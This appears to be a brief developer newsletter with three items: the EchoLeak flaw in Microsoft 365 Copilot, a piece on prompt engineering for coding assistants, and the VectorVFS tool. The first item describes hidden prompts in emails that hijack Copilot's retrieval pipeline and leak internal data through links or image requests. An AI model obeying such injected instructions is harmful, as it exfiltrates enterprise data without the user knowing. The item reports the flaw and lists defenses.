Dev
EchoLeak - First known Zero click AI Vulnerability
A critical zero-click flaw called EchoLeak was discovered in Microsoft 365 Copilot, allowing data exfiltration from enterprise systems without user interaction. It hijacks Copilot’s RAG pipeline by injecting hidden prompts into seemingly benign emails, coaxing the model to spill internal data via auto-generated links or image requests. Fixed server-side in May (CVE-2025-32711) with no known exploits so far, the incident highlights a new attack surface in AI systems—where LLMs leak data silently. Enterprises should urgently tighten prompt-injection defenses, scope retrieval inputs, and sanitize model outputs to avoid similar LLM-triggered leaks.
A comprehensive look at prompts to help developers with coding tasks
A good look at prompts that will help with your Vibe Coding Journey.
Prompt engineering is a bit of an art and a bit of a science – and as we’ve seen, it’s quickly becoming a must-have skill for developers working with AI code assistants. By crafting clear, context-rich prompts, you essentially teach the AI what you need, just as you would onboard a human team member or explain a problem to a peer.
Let me know how you do with these prompts.
Your filesystem as a Vector DB - VectorVFS
Ever wanted to do a AI search on your file system ? Now you can. VectorVFS is a lightweight Python package that transforms your Linux filesystem into a vector database by leveraging the native VFS (Virtual File System) extended attributes. Rather than maintaining a separate index or external database, VectorVFS stores vector embeddings directly alongside each file—turning your existing directory structure into an efficient and semantically searchable embedding store.